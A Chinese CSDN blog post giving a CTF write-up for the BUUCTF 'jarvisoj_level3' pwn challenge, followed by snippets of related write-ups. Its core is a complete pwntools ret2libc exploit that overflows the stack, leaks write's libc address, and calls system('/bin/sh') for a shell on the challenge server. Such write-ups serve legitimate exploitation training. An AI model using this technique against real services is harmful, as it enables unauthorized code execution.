buuctf jarvisoj_level3(libc)

最新推荐文章于 2024-07-11 19:14:54 发布
最新推荐文章于 2024-07-11 19:14:54 发布
阅读量363 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/105876707
版权

常规32位泄漏libc

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './level3'
local_libc  = '/lib/x86_64-linux-gnu/libc-2.23.so'
remote_libc = './libc.so.6'
 
 
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 26056)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims  			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)


write_got = elf.got['write']
write_plt = elf.plt['write']
main = elf.sym['main']

p1 = flat(['a'*0x88, 'b'*4, write_plt, main, 1, write_got, 0x100])
sea('Input:\n', p1)
#log.info(rl())
write_addr = uu32(ru('\xf7')[-4:])
#printf_addr = uu32(rc(4))
log.info(hex(write_addr))

libc = LibcSearcher('write', write_addr)
libcbase = write_addr - libc.dump('write')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')

p2 = flat(['a'*0x88, 'b'*4, system_addr, 'b'*4, binsh_addr])
sea('Input:\n', p2)




r.interactive()
真岛忍
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTFjarvisoj_level3_x64(write up)
qq_44768749的博客
08-24 890
BUUCTFjarvisoj_level3_x640x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,仅开启栈不可执行保护 0x02 运行 输入一个字符串 0x03 IDA 字符串可输入长度可造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露read函数地址来得到libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 这里有个难点就是参数需要放到对应
BUUCTFjarvisoj_level3
m0_51251108的博客
12-28 347
BUUCTFjarvisoj_level3 标准的ret2libc 这里记一下找偏移的方法: readelf -a libc库文件|grep “puts” 或者用symbol这些 strings 文件 -tx|grep “/bin/sh” 抓出/bin/sh 可以找/bin/sh在libc中的地址 这里直接给出exp: from pwn import* r=remote('node3.buuoj.cn',28705) libc=ELF('./libc-2.23.so') elf=ELF('./
jarvisoj_level3_x64解题
最新发布
2301_81504456的博客
07-11 356
X64系统中程序参数前六个保存在寄存器中。
BUUCTF(pwn)jarvisoj_level3
半岛铁盒的博客
04-02 294
EXP from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25564) main=0x8048484 elf=ELF('./2') write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl..
[BUUCTF]PWN——jarvisoj_level3
BangSen1的博客
03-16 1248
jarvisoj_level3 32位,NX保护。 运行程序。 用IDA打开,shift+f12检索 ,找到关键函数。 参数buf溢出漏洞,利用ret2libc获取shell。 1,利用write函数泄露libc版本 write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.recvuntil('
BUUCTF-jarvisoj_level3
Rt1Text的博客
11-27 198
main很明显的溢出点再没有其它有用的信息,而且本题没有system,bin/sh既然如此,解决思路就有了,泄露libc,32位的ret2libc3。
avr-libc-user-manual-1.6.1.zip_avr libc user manu_it_libc.a
09-24
avr-libc 手册. It is a C library implementation for use with GNU GCC and GNU binutils for development of programs for Atmel s AVR microcontrollers.
avr-libc-user-manual-1.8.0.pdf.rar_The Up and Up_avr-libc
09-19
There is a wealth of information in this document which goes beyond simply describing the interfaces and routines provided by the ...available development tools: binutils, gcc avr-libc and many others
libc-html_node.tar.gz_GCC 函数_libc
09-21
《GCC 函数_libc深入解析》 在编程领域,C语言是基础且强大的工具,而其背后的库函数更是程序员日常工作中不可或缺的资源。本资料集《libc-html_node.tar.gz》全面聚焦于GCC编译器下的libc库,为开发者提供了一份...
libc++_shared.rar
07-13
博客资源文件,32位,存在于android\android-ndk-r12b\sources\cxx-stl\llvm-libc++\libs,博客https://blog.csdn.net/u013370255/article/details/107252777
libc_libc_zip_源码
10-04
3. **本地化支持**:glibc包含了对不同地区和语言的支持,如日期时间格式、字符集转换等,使得软件可以适应全球化的环境。 4. **线程与同步**:glibc提供了线程创建、同步原语等多线程编程所需的功能,使得开发者...
BUUCTF jarvisoj_level3
红叶的博客
10-27 344
切入点从泄露write函数入手。栈溢出漏洞,ret2libc。IDA Pro 静态调试。
BUUCTF pwn——jarvisoj_level3
CNS-Enterprise BCC-1701-J
04-21 171
BUUCTF 做题练习
jarvisoj level3
sun的博客
10-03 1022
level3 将文件下载下来使用linux下的checksec进行检查开启了什么安全机制 sun@ubuntu:~/Desktop/test$ checksec level3 [*] '/home/sun/Desktop/test/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No c...
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 461
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
BUUCTF--pwn--jarvisoj_level3【ret2libc
qq_73149934的博客
12-04 303
BUUCTF--pwn--jarvisoj_level3
BUUCTF(pwn)jarvisoj_level3_x64
半岛铁盒的博客
04-01 442
这道题是一道简单的rop类型的题目,跟之前做的题目有一些差异:( 这是64位的需要一些额外的操作 ) 64位汇编传参,当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。 这里我们使用 write 函数 来泄密 libc地址 ssize_t write(int fd,const void*buf,size_t count); 参数说明: f.
jarvisoj_level3_x64
m0sway的博客
11-26 595
jarvisoj_level3_x64 使用checksec查看: 只开启了栈不可执行,应该是jarvisoj_level3的x64版本,直接放进IDA中看吧: 主函数中直接给出了漏洞函数,跟进查看: read()函数,存在栈溢出,和jarvisoj_level3的主要区别在栈上传参和寄存器传参。 exp: from pwn import * #start # r = process("../buu/jarvisoj_level3_x64") r = remote("node4.buuoj.cn",
__libc_start_main过程机器死机
07-27
3. 访问非法内存:如果应用程序在__libc_start_main过程中尝试访问非法的内存地址,比如访问已释放的内存或者越界访问数组,那么操作系统可能会将其视为错误行为并导致机器死机。 为了解决这个问题,可以尝试以下几...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值